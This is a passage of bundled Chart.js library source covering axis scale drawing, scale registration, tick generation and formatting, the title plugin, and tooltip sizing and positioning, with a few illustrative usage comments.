if (helpers.isArray(label)) {
for (var i = 0, y = -(label.length - 1) * tickFontSize * 0.75; i < label.length; ++i) {
// We just make sure the multiline element is a string here..
context.fillText('' + label[i], 0, y);
// apply the same line spacing as used in the fit calculation above
y += (tickFontSize * 1.5);
}
} else {
context.fillText(label, 0, 0);
}
context.restore();
}
});
if (scaleLabel.display) {
// Draw the scale label
var scaleLabelX;
var scaleLabelY;
var rotation = 0;
if (isHorizontal) {
scaleLabelX = me.left + ((me.right - me.left) / 2); // midpoint of the width
scaleLabelY = options.position === 'bottom' ? me.bottom - (scaleLabelFontSize / 2) : me.top + (scaleLabelFontSize / 2);
} else {
var isLeft = options.position === 'left';
scaleLabelX = isLeft ? me.left + (scaleLabelFontSize / 2) : me.right - (scaleLabelFontSize / 2);
scaleLabelY = me.top + ((me.bottom - me.top) / 2);
rotation = isLeft ? -0.5 * Math.PI : 0.5 * Math.PI;
}
context.save();
context.translate(scaleLabelX, scaleLabelY);
context.rotate(rotation);
context.textAlign = 'center';
context.textBaseline = 'middle';
context.fillStyle = scaleLabelFontColor; // render in correct colour
context.font = scaleLabelFont;
context.fillText(scaleLabel.labelString, 0, 0);
context.restore();
}
if (gridLines.drawBorder) {
// Draw the line at the edge of the axis
context.lineWidth = helpers.getValueAtIndexOrDefault(gridLines.lineWidth, 0);
context.strokeStyle = helpers.getValueAtIndexOrDefault(gridLines.color, 0);
var x1 = me.left,
x2 = me.right,
y1 = me.top,
y2 = me.bottom;
var aliasPixel = helpers.aliasPixel(context.lineWidth);
if (isHorizontal) {
y1 = y2 = options.position === 'top' ? me.bottom : me.top;
y1 += aliasPixel;
y2 += aliasPixel;
} else {
x1 = x2 = options.position === 'left' ? me.right : me.left;
x1 += aliasPixel;
x2 += aliasPixel;
}
context.beginPath();
context.moveTo(x1, y1);
context.lineTo(x2, y2);
context.stroke();
}
}
});
};
}, {}], 33: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.scaleService = {
// Scale registration object. Extensions can register new scale types (such as log or DB scales) and then
// use the new chart options to grab the correct scale
constructors: {},
// Scale config defaults
defaults: {},
// Use a registration function so that we can move to an ES6 map when we no longer need to support
// old browsers
registerScaleType: function (type, scaleConstructor, defaults) {
this.constructors[type] = scaleConstructor;
this.defaults[type] = helpers.clone(defaults);
},
getScaleConstructor: function (type) {
return this.constructors.hasOwnProperty(type) ? this.constructors[type] : undefined;
},
getScaleDefaults: function (type) {
// Return the scale defaults merged with the global settings so that we always use the latest ones
return this.defaults.hasOwnProperty(type) ? helpers.scaleMerge(Chart.defaults.scale, this.defaults[type]) : {};
},
updateScaleDefaults: function (type, additions) {
var defaults = this.defaults;
if (defaults.hasOwnProperty(type)) {
defaults[type] = helpers.extend(defaults[type], additions);
}
},
addScalesToLayout: function (chartInstance) {
// Adds each scale to the chart.boxes array to be sized accordingly
helpers.each(chartInstance.scales, function (scale) {
Chart.layoutService.addBox(chartInstance, scale);
});
}
};
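// Example (illustrative sketch): how an extension might register a custom scale
// type with this service. The 'sqrt' type name and SquareRootScale class are
// hypothetical, not part of the library.
//
// var SquareRootScale = Chart.Scale.extend({
//     determineDataLimits: function () { /* compute this.min / this.max */ },
//     buildTicks: function () { /* populate this.ticks */ },
//     getPixelForValue: function (value) { /* map a value to a pixel */ }
// });
// Chart.scaleService.registerScaleType('sqrt', SquareRootScale, { position: 'left' });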
};
}, {}], 34: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
/**
* Namespace to hold static tick generation functions
* @namespace Chart.Ticks
*/
Chart.Ticks = {
/**
* Namespace to hold generators for different types of ticks
* @namespace Chart.Ticks.generators
*/
generators: {
/**
* Interface for the options provided to the numeric tick generator
* @interface INumericTickGenerationOptions
*/
/**
* The maximum number of ticks to display
* @name INumericTickGenerationOptions#maxTicks
* @type Number
*/
/**
* The distance between each tick.
* @name INumericTickGenerationOptions#stepSize
* @type Number
* @optional
*/
/**
* Forced minimum for the ticks. If not specified, the minimum of the data range is used to calculate the tick minimum
* @name INumericTickGenerationOptions#min
* @type Number
* @optional
*/
/**
* The maximum value of the ticks. If not specified, the maximum of the data range is used to calculate the tick maximum
* @name INumericTickGenerationOptions#max
* @type Number
* @optional
*/
/**
* Generate a set of linear ticks
* @method Chart.Ticks.generators.linear
* @param generationOptions {INumericTickGenerationOptions} the options used to generate the ticks
* @param dataRange {IRange} the range of the data
* @returns {Array<Number>} array of tick values
*/
linear: function (generationOptions, dataRange) {
var ticks = [];
// To get a "nice" value for the tick spacing, we will use the appropriately named
// "nice number" algorithm. See http://stackoverflow.com/questions/8506881/nice-label-algorithm-for-charts-with-minimum-ticks
// for details.
var spacing;
if (generationOptions.stepSize && generationOptions.stepSize > 0) {
spacing = generationOptions.stepSize;
} else {
var niceRange = helpers.niceNum(dataRange.max - dataRange.min, false);
spacing = helpers.niceNum(niceRange / (generationOptions.maxTicks - 1), true);
}
var niceMin = Math.floor(dataRange.min / spacing) * spacing;
var niceMax = Math.ceil(dataRange.max / spacing) * spacing;
// If min, max and stepSize is set and they make an evenly spaced scale use it.
if (generationOptions.min && generationOptions.max && generationOptions.stepSize) {
var minMaxDeltaDivisibleByStepSize = ((generationOptions.max - generationOptions.min) % generationOptions.stepSize) === 0;
if (minMaxDeltaDivisibleByStepSize) {
niceMin = generationOptions.min;
niceMax = generationOptions.max;
}
}
var numSpaces = (niceMax - niceMin) / spacing;
// If very close to our rounded value, use it.
if (helpers.almostEquals(numSpaces, Math.round(numSpaces), spacing / 1000)) {
numSpaces = Math.round(numSpaces);
} else {
numSpaces = Math.ceil(numSpaces);
}
// Put the values into the ticks array
ticks.push(generationOptions.min !== undefined ? generationOptions.min : niceMin);
for (var j = 1; j < numSpaces; ++j) {
ticks.push(niceMin + (j * spacing));
}
ticks.push(generationOptions.max !== undefined ? generationOptions.max : niceMax);
return ticks;
},
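// For example, generators.linear({ maxTicks: 6 }, { min: 0, max: 10 }) computes
// a nice spacing of 2 and returns [0, 2, 4, 6, 8, 10].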
/**
* Generate a set of logarithmic ticks
* @method Chart.Ticks.generators.logarithmic
* @param generationOptions {INumericTickGenerationOptions} the options used to generate the ticks
* @param dataRange {IRange} the range of the data
* @returns {Array<Number>} array of tick values
*/
logarithmic: function (generationOptions, dataRange) {
var ticks = [];
var getValueOrDefault = helpers.getValueOrDefault;
// Figure out the maximum number of ticks we can support based on the size of
// the axis area. For now, we say that the minimum tick spacing in pixels must be 50.
// We also limit the maximum number of ticks to 11, which gives a nice 10 squares on
// the graph.
var tickVal = getValueOrDefault(generationOptions.min, Math.pow(10, Math.floor(helpers.log10(dataRange.min))));
while (tickVal < dataRange.max) {
ticks.push(tickVal);
var exp;
var significand;
if (tickVal === 0) {
exp = Math.floor(helpers.log10(dataRange.minNotZero));
significand = Math.round(dataRange.minNotZero / Math.pow(10, exp));
} else {
exp = Math.floor(helpers.log10(tickVal));
significand = Math.floor(tickVal / Math.pow(10, exp)) + 1;
}
if (significand === 10) {
significand = 1;
++exp;
}
tickVal = significand * Math.pow(10, exp);
}
var lastTick = getValueOrDefault(generationOptions.max, tickVal);
ticks.push(lastTick);
return ticks;
}
},
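// For example, generators.logarithmic({}, { min: 1, max: 100 }) walks the
// significands and returns [1, 2, ..., 9, 10, 20, ..., 90, 100].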
/**
* Namespace to hold formatters for different types of ticks
* @namespace Chart.Ticks.formatters
*/
formatters: {
/**
* Formatter for value labels
* @method Chart.Ticks.formatters.values
* @param value the value to display
* @return {String|Array} the label to display
*/
values: function (value) {
return helpers.isArray(value) ? value : '' + value;
},
/**
* Formatter for linear numeric ticks
* @method Chart.Ticks.formatters.linear
* @param tickValue {Number} the value to be formatted
* @param index {Number} the position of the tickValue parameter in the ticks array
* @param ticks {Array<Number>} the list of ticks being converted
* @return {String} string representation of the tickValue parameter
*/
linear: function (tickValue, index, ticks) {
// If we have lots of ticks, don't use the first gap to compute the spacing since it can be irregular; use the gap between the 2nd and 3rd ticks instead
var delta = ticks.length > 3 ? ticks[2] - ticks[1] : ticks[1] - ticks[0];
// If we have a number like 2.5 as the delta, figure out how many decimal places we need
if (Math.abs(delta) > 1) {
if (tickValue !== Math.floor(tickValue)) {
// not an integer
delta = tickValue - Math.floor(tickValue);
}
}
var logDelta = helpers.log10(Math.abs(delta));
var tickString = '';
if (tickValue !== 0) {
var numDecimal = -1 * Math.floor(logDelta);
numDecimal = Math.max(Math.min(numDecimal, 20), 0); // toFixed has a max of 20 decimal places
tickString = tickValue.toFixed(numDecimal);
} else {
tickString = '0'; // never show decimal places for 0
}
return tickString;
},
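// For example, formatters.linear(2.5, 1, [0, 2.5, 5]) sees a fractional tick,
// derives one decimal place from the delta, and returns '2.5'.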
logarithmic: function (tickValue, index, ticks) {
var remain = tickValue / (Math.pow(10, Math.floor(helpers.log10(tickValue))));
if (tickValue === 0) {
return '0';
} else if (remain === 1 || remain === 2 || remain === 5 || index === 0 || index === ticks.length - 1) {
return tickValue.toExponential();
}
return '';
}
}
};
};
}, {}], 35: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
Chart.defaults.global.title = {
display: false,
position: 'top',
fullWidth: true, // marks that this box should take the full width of the canvas (pushing down other boxes)
fontStyle: 'bold',
padding: 10,
// actual title
text: ''
};
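// Example (illustrative sketch): enabling the title from a chart config; the
// text shown is arbitrary.
//
// options: { title: { display: true, text: 'Monthly Sales', fontSize: 16 } }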
var noop = helpers.noop;
Chart.Title = Chart.Element.extend({
initialize: function (config) {
var me = this;
helpers.extend(me, config);
me.options = helpers.configMerge(Chart.defaults.global.title, config.options);
// Contains hit boxes for each dataset (in dataset order)
me.legendHitBoxes = [];
},
// These methods are ordered by lifecycle. Utilities then follow.
beforeUpdate: function () {
var chartOpts = this.chart.options;
if (chartOpts && chartOpts.title) {
this.options = helpers.configMerge(Chart.defaults.global.title, chartOpts.title);
}
},
update: function (maxWidth, maxHeight, margins) {
var me = this;
// Update Lifecycle - Probably don't want to ever extend or overwrite this function ;)
me.beforeUpdate();
// Absorb the master measurements
me.maxWidth = maxWidth;
me.maxHeight = maxHeight;
me.margins = margins;
// Dimensions
me.beforeSetDimensions();
me.setDimensions();
me.afterSetDimensions();
// Labels
me.beforeBuildLabels();
me.buildLabels();
me.afterBuildLabels();
// Fit
me.beforeFit();
me.fit();
me.afterFit();
//
me.afterUpdate();
return me.minSize;
},
afterUpdate: noop,
//
beforeSetDimensions: noop,
setDimensions: function () {
var me = this;
// Set the unconstrained dimension before label rotation
if (me.isHorizontal()) {
// Reset position before calculating rotation
me.width = me.maxWidth;
me.left = 0;
me.right = me.width;
} else {
me.height = me.maxHeight;
// Reset position before calculating rotation
me.top = 0;
me.bottom = me.height;
}
// Reset padding
me.paddingLeft = 0;
me.paddingTop = 0;
me.paddingRight = 0;
me.paddingBottom = 0;
// Reset minSize
me.minSize = {
width: 0,
height: 0
};
},
afterSetDimensions: noop,
//
beforeBuildLabels: noop,
buildLabels: noop,
afterBuildLabels: noop,
//
beforeFit: noop,
fit: function () {
var me = this,
valueOrDefault = helpers.getValueOrDefault,
opts = me.options,
globalDefaults = Chart.defaults.global,
display = opts.display,
fontSize = valueOrDefault(opts.fontSize, globalDefaults.defaultFontSize),
minSize = me.minSize;
if (me.isHorizontal()) {
minSize.width = me.maxWidth; // fill all the width
minSize.height = display ? fontSize + (opts.padding * 2) : 0;
} else {
minSize.width = display ? fontSize + (opts.padding * 2) : 0;
minSize.height = me.maxHeight; // fill all the height
}
me.width = minSize.width;
me.height = minSize.height;
},
afterFit: noop,
// Shared Methods
isHorizontal: function () {
var pos = this.options.position;
return pos === 'top' || pos === 'bottom';
},
// Actually draw the title block on the canvas
draw: function () {
var me = this,
ctx = me.ctx,
valueOrDefault = helpers.getValueOrDefault,
opts = me.options,
globalDefaults = Chart.defaults.global;
if (opts.display) {
var fontSize = valueOrDefault(opts.fontSize, globalDefaults.defaultFontSize),
fontStyle = valueOrDefault(opts.fontStyle, globalDefaults.defaultFontStyle),
fontFamily = valueOrDefault(opts.fontFamily, globalDefaults.defaultFontFamily),
titleFont = helpers.fontString(fontSize, fontStyle, fontFamily),
rotation = 0,
titleX,
titleY,
top = me.top,
left = me.left,
bottom = me.bottom,
right = me.right,
maxWidth;
ctx.fillStyle = valueOrDefault(opts.fontColor, globalDefaults.defaultFontColor); // render in correct colour
ctx.font = titleFont;
// Horizontal
if (me.isHorizontal()) {
titleX = left + ((right - left) / 2); // midpoint of the width
titleY = top + ((bottom - top) / 2); // midpoint of the height
maxWidth = right - left;
} else {
titleX = opts.position === 'left' ? left + (fontSize / 2) : right - (fontSize / 2);
titleY = top + ((bottom - top) / 2);
maxWidth = bottom - top;
rotation = Math.PI * (opts.position === 'left' ? -0.5 : 0.5);
}
ctx.save();
ctx.translate(titleX, titleY);
ctx.rotate(rotation);
ctx.textAlign = 'center';
ctx.textBaseline = 'middle';
ctx.fillText(opts.text, 0, 0, maxWidth);
ctx.restore();
}
}
});
// Register the title plugin
Chart.plugins.register({
beforeInit: function (chartInstance) {
var opts = chartInstance.options;
var titleOpts = opts.title;
if (titleOpts) {
chartInstance.titleBlock = new Chart.Title({
ctx: chartInstance.chart.ctx,
options: titleOpts,
chart: chartInstance
});
Chart.layoutService.addBox(chartInstance, chartInstance.titleBlock);
}
}
});
};
}, {}], 36: [function (require, module, exports) {
'use strict';
module.exports = function (Chart) {
var helpers = Chart.helpers;
/**
* Helper method to merge the opacity into a color
*/
function mergeOpacity(colorString, opacity) {
var color = helpers.color(colorString);
return color.alpha(opacity * color.alpha()).rgbaString();
}
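// For example, mergeOpacity('rgba(0, 0, 0, 0.8)', 0.5) multiplies the alphas
// and returns 'rgba(0, 0, 0, 0.4)'.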
Chart.defaults.global.tooltips = {
enabled: true,
custom: null,
mode: 'nearest',
position: 'average',
intersect: true,
backgroundColor: 'rgba(0,0,0,0.8)',
titleFontStyle: 'bold',
titleSpacing: 2,
titleMarginBottom: 6,
titleFontColor: '#fff',
titleAlign: 'left',
bodySpacing: 2,
bodyFontColor: '#fff',
bodyAlign: 'left',
footerFontStyle: 'bold',
footerSpacing: 2,
footerMarginTop: 6,
footerFontColor: '#fff',
footerAlign: 'left',
yPadding: 6,
xPadding: 6,
caretSize: 5,
cornerRadius: 6,
multiKeyBackground: '#fff',
displayColors: true,
callbacks: {
// Args are: (tooltipItems, data)
beforeTitle: helpers.noop,
title: function (tooltipItems, data) {
// Pick first xLabel for now
var title = '';
var labels = data.labels;
var labelCount = labels ? labels.length : 0;
if (tooltipItems.length > 0) {
var item = tooltipItems[0];
if (item.xLabel) {
title = item.xLabel;
} else if (labelCount > 0 && item.index < labelCount) {
title = labels[item.index];
}
}
return title;
},
afterTitle: helpers.noop,
// Args are: (tooltipItems, data)
beforeBody: helpers.noop,
// Args are: (tooltipItem, data)
beforeLabel: helpers.noop,
label: function (tooltipItem, data) {
var datasetLabel = data.datasets[tooltipItem.datasetIndex].label || '';
return datasetLabel + ': ' + tooltipItem.yLabel;
},
labelColor: function (tooltipItem, chartInstance) {
var meta = chartInstance.getDatasetMeta(tooltipItem.datasetIndex);
var activeElement = meta.data[tooltipItem.index];
var view = activeElement._view;
return {
borderColor: view.borderColor,
backgroundColor: view.backgroundColor
};
},
afterLabel: helpers.noop,
// Args are: (tooltipItems, data)
afterBody: helpers.noop,
// Args are: (tooltipItems, data)
beforeFooter: helpers.noop,
footer: helpers.noop,
afterFooter: helpers.noop
}
};
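// Example (illustrative sketch): overriding the label callback from a chart
// config to append a unit; the 'kWh' unit is hypothetical.
//
// options: {
//     tooltips: {
//         callbacks: {
//             label: function (tooltipItem, data) {
//                 var name = data.datasets[tooltipItem.datasetIndex].label || '';
//                 return name + ': ' + tooltipItem.yLabel + ' kWh';
//             }
//         }
//     }
// }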
// Helper to push or concat based on if the 2nd parameter is an array or not
function pushOrConcat(base, toPush) {
if (toPush) {
if (helpers.isArray(toPush)) {
// base = base.concat(toPush);
Array.prototype.push.apply(base, toPush);
} else {
base.push(toPush);
}
}
return base;
}
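// For example, pushOrConcat(['a'], ['b', 'c']) appends in place and returns
// ['a', 'b', 'c']; pushOrConcat(['a'], 'b') returns ['a', 'b']; a falsy toPush
// leaves base unchanged.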
// Private helper to create a tooltip item model
// @param element : the chart element (point, arc, bar) to create the tooltip item for
// @return : new tooltip item
function createTooltipItem(element) {
var xScale = element._xScale;
var yScale = element._yScale || element._scale; // handle radar || polarArea charts
var index = element._index,
datasetIndex = element._datasetIndex;
return {
xLabel: xScale ? xScale.getLabelForIndex(index, datasetIndex) : '',
yLabel: yScale ? yScale.getLabelForIndex(index, datasetIndex) : '',
index: index,
datasetIndex: datasetIndex,
x: element._model.x,
y: element._model.y
};
}
/**
* Helper to get the reset model for the tooltip
* @param tooltipOpts {Object} the tooltip options
*/
function getBaseModel(tooltipOpts) {
var globalDefaults = Chart.defaults.global;
var getValueOrDefault = helpers.getValueOrDefault;
return {
// Positioning
xPadding: tooltipOpts.xPadding,
yPadding: tooltipOpts.yPadding,
xAlign: tooltipOpts.xAlign,
yAlign: tooltipOpts.yAlign,
// Body
bodyFontColor: tooltipOpts.bodyFontColor,
_bodyFontFamily: getValueOrDefault(tooltipOpts.bodyFontFamily, globalDefaults.defaultFontFamily),
_bodyFontStyle: getValueOrDefault(tooltipOpts.bodyFontStyle, globalDefaults.defaultFontStyle),
_bodyAlign: tooltipOpts.bodyAlign,
bodyFontSize: getValueOrDefault(tooltipOpts.bodyFontSize, globalDefaults.defaultFontSize),
bodySpacing: tooltipOpts.bodySpacing,
// Title
titleFontColor: tooltipOpts.titleFontColor,
_titleFontFamily: getValueOrDefault(tooltipOpts.titleFontFamily, globalDefaults.defaultFontFamily),
_titleFontStyle: getValueOrDefault(tooltipOpts.titleFontStyle, globalDefaults.defaultFontStyle),
titleFontSize: getValueOrDefault(tooltipOpts.titleFontSize, globalDefaults.defaultFontSize),
_titleAlign: tooltipOpts.titleAlign,
titleSpacing: tooltipOpts.titleSpacing,
titleMarginBottom: tooltipOpts.titleMarginBottom,
// Footer
footerFontColor: tooltipOpts.footerFontColor,
_footerFontFamily: getValueOrDefault(tooltipOpts.footerFontFamily, globalDefaults.defaultFontFamily),
_footerFontStyle: getValueOrDefault(tooltipOpts.footerFontStyle, globalDefaults.defaultFontStyle),
footerFontSize: getValueOrDefault(tooltipOpts.footerFontSize, globalDefaults.defaultFontSize),
_footerAlign: tooltipOpts.footerAlign,
footerSpacing: tooltipOpts.footerSpacing,
footerMarginTop: tooltipOpts.footerMarginTop,
// Appearance
caretSize: tooltipOpts.caretSize,
cornerRadius: tooltipOpts.cornerRadius,
backgroundColor: tooltipOpts.backgroundColor,
opacity: 0,
legendColorBackground: tooltipOpts.multiKeyBackground,
displayColors: tooltipOpts.displayColors
};
}
/**
* Get the size of the tooltip
*/
function getTooltipSize(tooltip, model) {
var ctx = tooltip._chart.ctx;
var height = model.yPadding * 2; // Tooltip Padding
var width = 0;
// Count of all lines in the body
var body = model.body;
var combinedBodyLength = body.reduce(function (count, bodyItem) {
return count + bodyItem.before.length + bodyItem.lines.length + bodyItem.after.length;
}, 0);
combinedBodyLength += model.beforeBody.length + model.afterBody.length;
var titleLineCount = model.title.length;
var footerLineCount = model.footer.length;
var titleFontSize = model.titleFontSize,
bodyFontSize = model.bodyFontSize,
footerFontSize = model.footerFontSize;
height += titleLineCount * titleFontSize; // Title Lines
height += titleLineCount ? (titleLineCount - 1) * model.titleSpacing : 0; // Title Line Spacing
height += titleLineCount ? model.titleMarginBottom : 0; // Title's bottom Margin
height += combinedBodyLength * bodyFontSize; // Body Lines
height += combinedBodyLength ? (combinedBodyLength - 1) * model.bodySpacing : 0; // Body Line Spacing
height += footerLineCount ? model.footerMarginTop : 0; // Footer Margin
height += footerLineCount * (footerFontSize); // Footer Lines
height += footerLineCount ? (footerLineCount - 1) * model.footerSpacing : 0; // Footer Line Spacing
// Title width
var widthPadding = 0;
var maxLineWidth = function (line) {
width = Math.max(width, ctx.measureText(line).width + widthPadding);
};
ctx.font = helpers.fontString(titleFontSize, model._titleFontStyle, model._titleFontFamily);
helpers.each(model.title, maxLineWidth);
// Body width
ctx.font = helpers.fontString(bodyFontSize, model._bodyFontStyle, model._bodyFontFamily);
helpers.each(model.beforeBody.concat(model.afterBody), maxLineWidth);
// Body lines may include some extra width due to the color box
widthPadding = model.displayColors ? (bodyFontSize + 2) : 0;
helpers.each(body, function (bodyItem) {
helpers.each(bodyItem.before, maxLineWidth);
helpers.each(bodyItem.lines, maxLineWidth);
helpers.each(bodyItem.after, maxLineWidth);
});
// Reset back to 0
widthPadding = 0;
// Footer width
ctx.font = helpers.fontString(footerFontSize, model._footerFontStyle, model._footerFontFamily);
helpers.each(model.footer, maxLineWidth);
// Add padding
width += 2 * model.xPadding;
return {
width: width,
height: height
};
}
/**
* Helper to get the alignment of a tooltip given the size
*/
function determineAlignment(tooltip, size) {
var model = tooltip._model;
var chart = tooltip._chart;
var chartArea = tooltip._chartInstance.chartArea;
var xAlign = 'center';
var yAlign = 'center';
if (model.y < size.height) {
yAlign = 'top';
} else if (model.y > (chart.height - size.height)) {
yAlign = 'bottom';
}
var lf, rf; // functions to determine left, right alignment
var olf, orf; // functions to determine if left/right alignment causes tooltip to go outside chart
var yf; // function to get the y alignment if the tooltip goes outside of the left or right edges
var midX = (chartArea.left + chartArea.right) / 2;
var midY = (chartArea.top + chartArea.bottom) / 2;
if (yAlign === 'center') {
lf = function (x) {
return x <= midX;
};
rf = function (x) {
return x > midX;
};
} else {
lf = function (x) {
return x <= (size.width / 2);
};
rf = function (x) {
return x >= (chart.width - (size.width / 2));
};
}
olf = function (x) {
return x + size.width > chart.width;
};
orf = function (x) {
return x - size.width < 0;
};
yf = function (y) {
return y <= midY ? 'top' : 'bottom';
};
if (lf(model.x)) {
xAlign = 'left';
// Is the tooltip too wide, going over the right side of the chart?
if (olf(model.x)) {
xAlign = 'center';
yAlign = yf(model.y);
}
} else if (rf(model.x)) {
xAlign = 'right';
// Is the tooltip too wide, going outside the left edge of the canvas?
if (orf(model.x)) {
xAlign = 'center';
yAlign = yf(model.y);
}
}
var opts = tooltip._options;
return {
xAlign: opts.xAlign ? opts.xAlign : xAlign,
yAlign: opts.yAlign ? opts.yAlign : yAlign
};
}
/**
* Helper to get the location a tooltip needs to be placed at given the initial position (via the vm) and the size and alignment
*/
function getBackgroundPoint(vm, size, alignment) {
// Background position: start from the tooltip anchor carried on the view model
// (x and y were previously never declared, leaving them undefined below)
var x = vm.x,
    y = vm.y,
    caretSize = vm.caretSize,
    caretPadding = vm.caretPadding,
    cornerRadius = vm.cornerRadius,
    xAlign = alignment.xAlign,
    yAlign = alignment.yAlign,
    paddingAndSize = caretSize + caretPadding,
    radiusAndPadding = cornerRadius + caretPadding;
if (xAlign === 'right') {
x -= size.width;
} else if (xAlign === 'center') {
x -= (size.width / 2);
}
if (yAlign === 'top') {
y += paddingAndSize;
} else if (yAlign === 'bottom') {
y -= size.height + paddingAndSize;
} else {
y -= (size.height / 2);
}
if (yAlign === 'center') {
if (xAlign === 'left') {
x += paddingAndSize;
} else if (xAlign === 'right') {
x -= paddingAndSize;
}
} else if (xAlign === 'left') {
x -= radiusAndPadding;
} else if (xAlign === 'right') {
x += radiusAndPadding;
}
return {
x: x,
y: y
};
}
Chart.Tooltip = Chart.Element.extend({
initialize: function () {
this._model = getBaseModel(this._options);
},
// Get the title
// Args are: (tooltipItem, data)
getTitle: function () {
var me = this;
var opts = me._options;
var callbacks = opts.callbacks;
var beforeTitle = callbacks.beforeTitle.apply(me, arguments),
title = callbacks.title.apply(me, arguments),
afterTitle = callbacks.afterTitle.apply(me, arguments);
var lines = [];
lines = pushOrConcat(lines, beforeTitle);
lines = pushOrConcat(lines, title);
lines = pushOrConcat(lines, afterTitle);
return lines;
},
// Args are: (tooltipItem, data)
getBeforeBody: function () {
var lines = this._options.callbacks.beforeBody.apply(this, arguments);
return helpers.isArray(lines) ? lines : lines !== undefined ? [lines] : [];
},
// Args are: (tooltipItem, data)
getBody: function (tooltipItems, data) {
var me = this;
var callbacks = me._options.callbacks;
var bodyItems = [];
helpers.each(tooltipItems, function (tooltipItem) {
var bodyItem = {
before: [],
lines: [],
after: []
};
pushOrConcat(bodyItem.before, callbacks.beforeLabel.call(me, tooltipItem, data));
pushOrConcat(bodyItem.lines, callbacks.label.call(me, tooltipItem, data));
pushOrConcat(bodyItem.after, callbacks.afterLabel.call(me, tooltipItem, data));
bodyItems.push(bodyItem);
});
return bodyItems;
},
// Args are: (tooltipItem, data)
getAfterBody: function () {
var lines = this._options.callbacks.afterBody.apply(this, arguments);
return helpers.isArray(lines) ? lines : lines !== undefined ? [lines] : [];
},
// Get the footer and beforeFooter and afterFooter lines
// Args are: (tooltipItem, data)
getFooter: function () {
var me = this;
var callbacks = me._options.callbacks;
var beforeFooter = callbacks.beforeFooter.apply(me, arguments);
var footer = callbacks.footer.apply(me, arguments);
var afterFooter = callbacks.afterFooter.apply(me, arguments);
var lines = [];
lines = pushOrConcat(lines, beforeFooter);
lines = pushOrConcat(lines, footer);
lines = pushOrConcat(lines, afterFooter);
return lines;
},
update: function (changed) {
var me = this;
var opts = me._options;
// Need to regenerate the model because it's faster than using extend and it is necessary due to the optimization in Chart.Element.transition
// that does _view = _model if ease === 1. This causes the 2nd tooltip update to set properties in both the view and model at the same time
// which breaks any animations.
var existingModel = me._model;
var model = me._model = getBaseModel(opts);
var active = me._active;
var data = me._data;
var chartInstance = me._chartInstance;
// In the case where active.length === 0 we need to keep these at existing values for good animations
var alignment = {
xAlign: existingModel.xAlign,
yAlign: existingModel.yAlign
};
var backgroundPoint = {
x: existingModel.x,
y: existingModel.y
};
var tooltipSize = {
width: existingModel.width,
height: existingModel.height
};
var tooltipPosition = {
x: existingModel.caretX,
y: existingModel.caretY
};
var i, len;
if (active.length) {
model.opacity = 1;
var labelColors = [];
tooltipPosition = Chart.Tooltip.positioners[opts.position](active, me._eventPosition);
var tooltipItems = [];
for (i = 0, len = active.length; i < len; ++i) {
tooltipItems.push(createTooltipItem(active[i]));
}
// If the user provided a filter function, use it to modify the tooltip items
if (opts.filter) {
tooltipItems = tooltipItems.filter(function (a) {
return opts.filter(a, data);
});
}
// If the user provided a sorting function, use it to modify the tooltip items
if (opts.itemSort) {
tooltipItems = tooltipItems.sort(function (a, b) {
return opts.itemSort(a, b, data);
});
}
// Determine colors for boxes
helpers.each(tooltipItems, function (tooltipItem) {
labelColors.push(opts.callbacks.labelColor.call(me, tooltipItem, chartInstance));
});
// Build the Text Lines
model.title = me.getTitle(tooltipItems, data);
model.beforeBody = me.getBeforeBody(tooltipItems, data);
model.body = me.getBody(tooltipItems, data);
model.afterBody = me.getAfterBody(tooltipItems, data);
model.footer = me.getFooter(tooltipItems, data);
// Initial positioning and colors
model.x = Math.round(tooltipPosition.x);
model.y = Math.round(tooltipPosition.y);
model.caretPadding = helpers.getValueOrDefault(tooltipPosition.padding, 2);
model.labelColors = labelColors;
// data points
model.dataPoints = tooltipItems;
// We need to determine alignment of the tooltip
tooltipSize = getTooltipSize(me, model);
alignment = determineAlignment(me, tooltipSize);
// Final Size and Position
backgroundPoint = getBackgroundPoint(model, tooltipSize, alignment);
} else {
model.opacity = 0;
}
model.xAlign = alignment.xAlign;
model.yAlign = alignment.yAlign;
model.x = backgroundPoint.x;
model.y = backgroundPoint.y;
model.width = tooltipSize.width;
model.height = tooltipSize.height;
// Point where the caret on the tooltip points to
model.caretX = tooltipPosition.x;
model.caretY = tooltipPosition.y;
me._model = model;
if (changed && opts.custom) {
opts.custom.call(me, model);
}
return me;
},
drawCaret: function (tooltipPoint, size, opacity) {
var vm = this._view;
var ctx = this._chart.ctx;
var x1, x2, x3;
var y1, y2, y3;
var caretSize = vm.caretSize;
var cornerRadius = vm.cornerRadius;
var xAlign = vm.xAlign,
yAlign = vm.yAlign;
var ptX = tooltipPoint.x,
ptY = tooltipPoint.y;
var width = size.width,
height = size.height;
if (yAlign === 'center') {
// Left or right side
if (xAlign === 'left') {
x1 = ptX;
x2 = x1 - caretSize;
x3 = x1;
} else {
x1 = ptX + width;
x2 = x1 + caretSize;
x3 = x1;
}
y2 = ptY + (height / 2);
y1 = y2 - caretSize;
y3 = y2 + caretSize;
} else {
if (xAlign === 'left') {
x1 = ptX + cornerRadius;
x2 = x1 + caretSize;
x3 = x2 + caretSize;
} else if (xAlign === 'right') {
x1 = ptX + width - cornerRadius;
x2 = x1 - caretSize;
x3 = x2 - caretSize;
} else {
x2 = ptX + (width / 2);
x1 = x2 - caretSize;
x3 = x2 + caretSize;
}
if (yAlign === 'top') {
y1 = ptY;
y2 = y1 - caretSize;
y3 = y1;
} else {
y1 = ptY + height;
y2 = y1 + caretSize;
y3 = y1;
}
}
ctx.fillStyle = mergeOpacity(vm.backgroundColor, opacity);
ctx.beginPath();
ctx.moveTo(x1, y1);
ctx.lineTo(x2, y2);
ctx.lineTo(x3, y3);
ctx.closePath();
ctx.fill();
},
drawTitle: function (pt, vm, ctx, opacity) {
var title = vm.title;
if (title.length) {
ctx.textAlign = vm._titleAlign;
ctx.textBaseline = 'top';
var titleFontSize = vm.titleFontSize,
titleSpacing = vm.titleSpacing;
ctx.fillStyle = mergeOpacity(vm.titleFontColor, opacity);
ctx.font = helpers.fontString(titleFontSize, vm._titleFontStyle, vm._titleFontFamily);
var i, len;
for (i = 0, len = title.length; i < len; ++i) {
ctx.fillText(title[i], pt.x, pt.y);
pt.y += titleFontSize + titleSpacing; // Line Height and spacing
if (i + 1 === title.length) {
pt.y += vm.titleMarginBottom - titleSpacing; // If Last, add margin, remove spacing
}
}
}
},
drawBody: function (pt, vm, ctx, opacity) {
var bodyFontSize = vm.bodyFontSize;
